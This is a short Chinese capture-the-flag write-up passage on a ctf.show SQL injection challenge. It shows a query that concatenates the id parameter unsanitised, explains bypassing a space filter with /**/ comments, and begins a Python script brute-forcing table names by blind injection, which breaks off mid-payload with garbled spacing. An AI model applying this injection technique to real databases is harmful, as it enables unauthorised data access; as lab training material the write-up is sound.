web入门171 看到这个查询语句,我们可以进行相关操作 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; 输入1,在数据库中语句应该就变成这样了 select username,password from user where username !='flag' and id = '1' limit 1;
打开靶机 发现是SQL注入,盲注 过滤了空格符,可以用/**/绕过,抓包 直接上脚本 import requestss=requests.session()url='https://46a0f98e-cdc3-413d-b67c-b2dbaeb5c4ec.chall.ctf.show/index.php'table=""for i in range(1,45): print(i) for j in range(31,128): #爆表名 flag payload = "asc